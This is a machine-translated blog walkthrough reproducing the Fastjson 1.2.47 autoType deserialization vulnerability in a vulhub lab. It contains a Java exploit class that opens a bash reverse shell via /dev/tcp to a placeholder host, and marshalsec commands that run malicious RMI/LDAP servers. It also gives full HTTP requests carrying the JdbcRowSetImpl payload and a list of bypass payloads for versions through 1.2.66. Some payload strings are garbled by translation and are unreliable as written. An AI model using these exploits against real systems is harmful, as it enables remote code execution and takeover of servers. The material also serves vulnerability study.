I. Vulnerability description
Fastjson is an open source JSON parser developed by Alibaba. It has excellent performance and is widely used in Java projects of various manufacturers. Fastjson provides autoType functionality, which allows users to specify the type of deserialization in the deserialization data by “@type”. Second, Fastjson’s custom deserialization mechanism calls setter methods and some getters in the specified class. When autoType is enabled and untrusted data is deserialized, an attacker can construct data that causes the code execution flow of the target application to enter a particular setter or getter method of a particular class. If the specified method of the specified class has logic that can be exploited maliciously (commonly referred to as a “Gadget”), Can cause some serious security problems. In Fastjson 1.2.47 and below, the caching mechanism can be used to bypass the disabled AutoType function.
Second, impact version
Fastjson1.2.47 and previous versions
3. Experimental environment
docker
https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce docker - compose up - dCopy the codeTomcat setup (public account background reply “Fastjson” to obtain the environment and EXP)
The location is under Tomcat/Webapps
Start tomcat
4. Recurrence of vulnerability
Save the exp below as an explosion.java file
import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; public class Exploit{ public Exploit() throws Exception { //Process p = Runtime.getRuntime().exec(new String[]{"cmd","/c","calc.exe"}); Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/XX.XX.XX.XX/34567; cat <&5 | while read line; do $line 2>&5 >&5; done"}); InputStream is = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(is)); String line; while((line = reader.readLine()) ! = null) { System.out.println(line); } p.waitFor(); is.close(); reader.close(); p.destroy(); } public static void main(String[] args) throws Exception { } }Copy the codeJavac exploits.java Compiles to generate the exploits.class fileCopy the codePython starts the Web service
python -m SimpleHTTPServer 1111
Copy the code
Start the EXphttp service using Python start the LDAP service (RMI service)
This time the ldap service is used again, and the corresponding RMI operations are also made screenshots. The main reason is that the JDk version of RMI is supported, and the version of LDAPJava is supported by the environment (pay attention to the JDk version, which is the key to the possible success).
Not supported. Basically, the RMI service accepts the request and simply closes. Pay attention to this detail
Java - cp marshalsec - 0.0.3 - the SNAPSHOT - all. Jar marshalsec. Jndi. RMIRefServer http://XX.XX.XX.XX:1111/\#Exploit 9999 Java - cp Marshalsec 0.0.3 - the SNAPSHOT - all. Jar marshalsec. Jndi. LDAPRefServer http://XX.XX.XX.XX:1111/\#Exploit 9999Copy the code
Ldap packet capture access modifies packets
POST /fastjson-1.2.47/ HTTP/1.1 Host: 192.168.0.104:8080 cache-control: max-age=0 upgrade-insecure -Requests: 1 the user-agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml; Q = 0.9, image/webp image/apng, * / *; Q = 0.8 Accept - Language: useful - CN, useful; Q =0.9 Connection: close Content-Length: 275 {"a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "Ldap: / / 192.168.0.104:9999 / exploits", "the autoCommit mode" : true}}Copy the codeRmi finishing
POST /fastjson-1.2.47/ HTTP/1.1 Host: 192.168.0.104:8080 cache-control: max-age=0 upgrade-insecure -Requests: 1 the user-agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml; Q = 0.9, image/webp image/apng, * / *; Q = 0.8 Accept - Language: useful - CN, useful; Q =0.9 Connection: close Content-Length: 274 {"a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "The rmi: / / 192.168.0.104:9999 / exploits", "the autoCommit mode" : true}}Copy the codeSend exp. Class
Rmi finishing
Listening for rebound shell
Access to the shell
Idea to debug start calculator
EXP versions:
Fastjson < = 1.2.24 {@ "type" : "com. Sun. Rowset. JdbcRowSetImpl", "dataSourceName" : "the rmi: / / X.X.X.X: 1099 / exp", "The autoCommit mode" : true} fastjson < = 1.2.41 {" @ type ":" Lcom. Sun. Rowset. JdbcRowSetImpl;" ,"dataSourceName":"rmi://x.x.x.x:1099/exp", "The autoCommit mode" : true} fastjson < = 1.2.42 {" @ type ":" LLcom. Sun. Rowset. JdbcRowSetImpl;;" ,"dataSourceName":"ldap://x.x.x.x:1099/exp", "The autoCommit mode" : true} fastjson < = 1.2.43 {"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://x.x.x.x:1099/exp", "The autoCommit mode" : true} fastjson < = 1.2.45 {"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://x.x.x.x:1099/exp" }} fastjson < = 1.2.47 {" a ": {" @ type" : "Java. Lang. Class", "val" : "com. Sun. Rowset. JdbcRowSetImpl}", "b" : {" @ type ": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://x.x.x.x:1099/exp", "autoCommit": True}} fastjson < = 1.2.62 {@ "type" : "... Org. Apache xbean propertyeditor JndiConverter ", "AsText" : "the rmi: / / X.X.X.X: 1099 / exp"} "; Fastjson < = 1.2.66 {@ "type" : ". Org. Apache shiro. Jndi. JndiObjectFactory ", "resourceName" : "ldap: / / X.X.X.X: 1099 / calc"} {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://x.x.x.x:1099/calc"} {"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://x.x.x.x:1099/calc"} {"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://x.x.x.x:1099/calc"}}Copy the codeIv. Vulnerability repair:
Upgrade Fastjson to the latest version
Github.com/alibaba/fas…
Note: The version of the Java environment that Rmi and Ldap start (use Java -version to check if your JDK version is lower than the following JDK version before starting the service)
Reference:
Cloud.tencent.com/developer/a…
Github.com/c0ny1/Fastj…
Mp.weixin.qq.com/s/i7-g89BJH…
www.cnblogs.com/zhengjim/p/…
Background reply “Fastjson” to obtain the environment and EXP
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Subscribe for more revisited articles and study notes
thelostworld
Safe road, side by side with you !!!!
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…